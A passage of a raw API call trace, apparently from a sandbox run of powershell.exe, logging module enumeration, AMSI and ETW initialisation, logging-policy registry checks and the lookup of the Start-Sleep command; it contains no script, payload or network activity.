0x409 [0174.072] CoCreateGuid (in: pguid=0x1b7df0f8 | out: pguid=0x1b7df0f8*(Data1=0x6491198, Data2=0x863d, Data3=0x4256, Data4=([0]=0x9d, [1]=0x1, [2]=0x2f, [3]=0x2a, [4]=0x60, [5]=0x93, [6]=0x83, [7]=0xda))) returned 0x0 [0174.080] GetCurrentProcessId () returned 0xdd8 [0174.080] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdd8) returned 0x5e0 [0174.080] EnumProcessModules (in: hProcess=0x5e0, lphModule=0x2125db0, cb=0x200, lpcbNeeded=0x1b7deed8 | out: lphModule=0x2125db0, lpcbNeeded=0x1b7deed8) returned 1 [0174.082] GetModuleInformation (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpmodinfo=0x2126020, cb=0x18 | out: lpmodinfo=0x2126020*(lpBaseOfDll=0x7ff6edf60000, SizeOfImage=0x78000, EntryPoint=0x7ff6edf631a0)) returned 1 [0174.082] CoTaskMemAlloc (cb=0x804) returned 0x1a5dd530 [0174.082] GetModuleBaseNameW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpBaseName=0x1a5dd530, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0174.082] CoTaskMemFree (pv=0x1a5dd530) [0174.082] CoTaskMemAlloc (cb=0x804) returned 0x1a5dd530 [0174.082] GetModuleFileNameExW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpFilename=0x1a5dd530, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0174.082] CoTaskMemFree (pv=0x1a5dd530) [0174.082] CloseHandle (hObject=0x5e0) returned 1 [0174.083] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdd8) returned 0x5e0 [0174.083] EnumProcessModules (in: hProcess=0x5e0, lphModule=0x2128288, cb=0x200, lpcbNeeded=0x1b7deed8 | out: lphModule=0x2128288, lpcbNeeded=0x1b7deed8) returned 1 [0174.084] GetModuleInformation (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpmodinfo=0x21284f8, cb=0x18 | out: lpmodinfo=0x21284f8*(lpBaseOfDll=0x7ff6edf60000, SizeOfImage=0x78000, EntryPoint=0x7ff6edf631a0)) returned 1 [0174.084] CoTaskMemAlloc (cb=0x804) returned 0x1a5dcd20 [0174.084] GetModuleBaseNameW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpBaseName=0x1a5dcd20, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0174.084] CoTaskMemFree (pv=0x1a5dcd20) [0174.084] CoTaskMemAlloc (cb=0x804) returned 0x1a5dace0 [0174.084] GetModuleFileNameExW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpFilename=0x1a5dace0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0174.084] CoTaskMemFree (pv=0x1a5dace0) [0174.085] CloseHandle (hObject=0x5e0) returned 1 [0174.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b7de9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0174.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dede0) returned 1 [0174.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b7deec0 | out: lpFileInformation=0x1b7deec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00)) returned 1 [0174.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7deda0) returned 1 [0174.086] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x1b7def98 | out: lpdwHandle=0x1b7def98) returned 0x73c [0174.087] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x73c, lpData=0x212a840 | out: lpData=0x212a840) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b7def18, puLen=0x1b7def10 | out: lplpBuffer=0x1b7def18*=0x212abd8, puLen=0x1b7def10) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212a8f8, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212a94c, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212a994, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212aa04, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212aa40, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212aac4, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212ab0c, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212ab7c, puLen=0x1b7deeb0) returned 1 [0174.087] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x0, puLen=0x1b7deeb0) returned 0 [0174.088] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x0, puLen=0x1b7deeb0) returned 0 [0174.088] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x0, puLen=0x1b7deeb0) returned 0 [0174.088] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x0, puLen=0x1b7deeb0) returned 0 [0174.088] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b7dee68, puLen=0x1b7dee60 | out: lplpBuffer=0x1b7dee68*=0x212abd8, puLen=0x1b7dee60) returned 1 [0174.088] VerLanguageNameW (in: wLang=0x409, szLang=0x1b7deb90, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0174.088] VerQueryValueW (in: pBlock=0x212a840, lpSubBlock="\\", lplpBuffer=0x1b7deeb8, puLen=0x1b7deeb0 | out: lplpBuffer=0x1b7deeb8*=0x212a868, puLen=0x1b7deeb0) returned 1 [0174.481] AmsiInitialize () returned 0x0 [0174.719] AmsiOpenSession () returned 0x0 [0174.719] AmsiScanString () returned 0x80070015 [0175.385] EtwEventRegister () returned 0x0 [0175.385] EtwEventSetInformation () returned 0x0 [0175.397] RoGetParameterizedTypeInstanceIID () returned 0x0 [0175.397] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0175.397] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0175.485] WindowsCreateStringReference () returned 0x0 [0175.485] RoGetActivationFactory () returned 0x0 [0175.487] QueryInterface () returned 0x0 [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0175.488] QueryInterface () returned 0x0 [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0175.488] Release () returned 0x4 [0175.488] CoGetContextToken (in: pToken=0x1b7dcb80 | out: pToken=0x1b7dcb80) returned 0x0 [0175.488] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0175.489] CoGetContextToken (in: pToken=0x1b7dcdc0 | out: pToken=0x1b7dcdc0) returned 0x0 [0175.489] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0175.489] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0175.489] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0175.489] WindowsDeleteString () returned 0x0 [0175.489] Release () returned 0x2 [0175.489] CoGetContextToken (in: pToken=0x1b7dd7f0 | out: pToken=0x1b7dd7f0) returned 0x0 [0175.490] CoGetContextToken (in: pToken=0x1b7dd6f0 | out: pToken=0x1b7dd6f0) returned 0x0 [0175.490] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0175.490] AddRef () returned 0x4 [0175.490] Release () returned 0x3 [0175.500] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0175.580] GenericStreamBase::Write () returned 0x0 [0175.580] GenericStreamBase::Write () returned 0x0 [0175.580] CoCreateGuid (in: pguid=0x7ffb09cf5390 | out: pguid=0x7ffb09cf5390*(Data1=0xe6eae69d, Data2=0xdc50, Data3=0x46d6, Data4=([0]=0xae, [1]=0x46, [2]=0xf2, [3]=0x35, [4]=0x74, [5]=0x31, [6]=0xb3, [7]=0x36))) returned 0x0 [0175.580] GenericStreamBase::Write () returned 0x0 [0175.583] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0175.583] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x3 [0175.583] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0175.583] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0175.583] Release () returned 0x3 [0175.584] CoGetContextToken (in: pToken=0x1b7dc930 | out: pToken=0x1b7dc930) returned 0x0 [0175.584] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0175.585] WindowsCreateString () returned 0x0 [0175.585] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x4 [0175.585] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0175.586] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0175.994] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b7dee40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0176.082] EtwEventActivityIdControl () returned 0x0 [0176.082] EtwEventActivityIdControl () returned 0x0 [0176.083] EtwEventActivityIdControl () returned 0x0 [0176.087] EtwEventActivityIdControl () returned 0x0 [0176.088] EtwEventActivityIdControl () returned 0x0 [0176.088] EtwEventActivityIdControl () returned 0x0 [0176.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7ddd80, nSize=0x80 | out: lpBuffer="") returned 0x0 [0176.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7ddd80, nSize=0x80 | out: lpBuffer="") returned 0x0 [0176.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7ddde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0176.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7deec8 | out: phkResult=0x1b7deec8*=0x0) returned 0x2 [0176.199] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7deec8 | out: phkResult=0x1b7deec8*=0x0) returned 0x2 [0176.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7ddd30, nSize=0x80 | out: lpBuffer="") returned 0x0 [0176.210] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b7de860, nSize=0x80 | out: lpBuffer="") returned 0x0 [0176.216] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7de660, nSize=0x80 | out: lpBuffer="") returned 0x3a [0176.217] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7de610, nSize=0x80 | out: lpBuffer="") returned 0x3a [0176.218] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7de680, nSize=0x80 | out: lpBuffer="") returned 0x63 [0176.298] CoTaskMemAlloc (cb=0x20e) returned 0x5c1970 [0176.298] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x5c1970 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x24 [0176.299] CoTaskMemFree (pv=0x5c1970) [0176.299] CoTaskMemAlloc (cb=0x20e) returned 0x5c1970 [0176.299] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x5c1970, cchBuffer=0x105 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.300] CoTaskMemFree (pv=0x5c1970) [0176.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.305] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x23 [0176.307] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0176.307] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.308] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.ps1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.317] CoTaskMemAlloc (cb=0x20e) returned 0x5c1970 [0176.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c1970, nSize=0x105 | out: lpBuffer="") returned 0x0 [0176.317] CoTaskMemFree (pv=0x5c1970) [0176.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x24 [0176.318] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0176.318] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.318] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.319] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psm1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.320] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x24 [0176.320] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0176.320] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.320] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.321] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psd1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.COM", lpFilePart=0x0) returned 0x23 [0176.322] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0176.322] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.322] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.COM", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.323] GetFileAttributesExW (in: 